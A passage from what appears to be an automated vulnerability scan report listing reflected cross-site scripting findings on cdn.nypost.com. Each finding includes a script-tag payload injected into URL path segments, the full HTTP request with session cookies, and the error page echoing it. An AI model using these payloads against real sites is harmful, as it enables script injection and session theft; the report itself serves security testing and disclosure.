This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostf42e3<script>alert(1)</script>e29f3d647b0/blocks/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostf42e3<script>alert(1)</script>e29f3d647b0/blocks/search/search.js</p>
...[SNIP]...

1.34. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e1dc2<script>alert(1)</script>e80da1bb8ae was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blockse1dc2<script>alert(1)</script>e80da1bb8ae/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blockse1dc2<script>alert(1)</script>e80da1bb8ae/search/search.js</p>
...[SNIP]...

1.35. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 53ada<script>alert(1)</script>e4c7fa34ff6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/search53ada<script>alert(1)</script>e4c7fa34ff6/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/search53ada<script>alert(1)</script>e4c7fa34ff6/search.js</p>
...[SNIP]...

1.36. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7df87<script>alert(1)</script>47f6c2355f3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/search/search.js7df87<script>alert(1)</script>47f6c2355f3 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:59 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/search/search.js7df87<script>alert(1)</script>47f6c2355f3</p>
...[SNIP]...

1.37. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc166<script>alert(1)</script>298a974b0f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigdc166<script>alert(1)</script>298a974b0f5/WebPortal/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigdc166<script>alert(1)</script>298a974b0f5/WebPortal/nypost/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.38. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b090a<script>alert(1)</script>952fd63b810 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalb090a<script>alert(1)</script>952fd63b810/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalb090a<script>alert(1)</script>952fd63b810/nypost/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.39. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5636a<script>alert(1)</script>1c170b9b73d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost5636a<script>alert(1)</script>1c170b9b73d/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:04 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost5636a<script>alert(1)</script>1c170b9b73d/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.40. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5bab6<script>alert(1)</script>2768fc0b80f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks5bab6<script>alert(1)</script>2768fc0b80f/section_blocks/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:13 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks5bab6<script>alert(1)</script>2768fc0b80f/section_blocks/section_blocks.js</p>
...[SNIP]...

1.41. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d2684<script>alert(1)</script>4a61dbbb73d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_blocksd2684<script>alert(1)</script>4a61dbbb73d/section_blocks.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:21 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/section_blocksd2684<script>alert(1)</script>4a61dbbb73d/section_blocks.js</p>
...[SNIP]...

1.42. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 95cdc<script>alert(1)</script>31cb68a600b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js95cdc<script>alert(1)</script>31cb68a600b HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:30 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js95cdc<script>alert(1)</script>31cb68a600b</p>
...[SNIP]...

1.43. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e57d<script>alert(1)</script>376ef1728a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig9e57d<script>alert(1)</script>376ef1728a8/WebPortal/nypost/blocks/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:23 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig9e57d<script>alert(1)</script>376ef1728a8/WebPortal/nypost/blocks/shareit/shareit.js</p>
...[SNIP]...

1.44. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2af3f<script>alert(1)</script>14cecd8da29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal2af3f<script>alert(1)</script>14cecd8da29/nypost/blocks/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:31 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal2af3f<script>alert(1)</script>14cecd8da29/nypost/blocks/shareit/shareit.js</p>
...[SNIP]...

1.45. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb3fb<script>alert(1)</script>b193c16edc8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostfb3fb<script>alert(1)</script>b193c16edc8/blocks/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:38 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostfb3fb<script>alert(1)</script>b193c16edc8/blocks/shareit/shareit.js</p>
...[SNIP]...

1.46. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

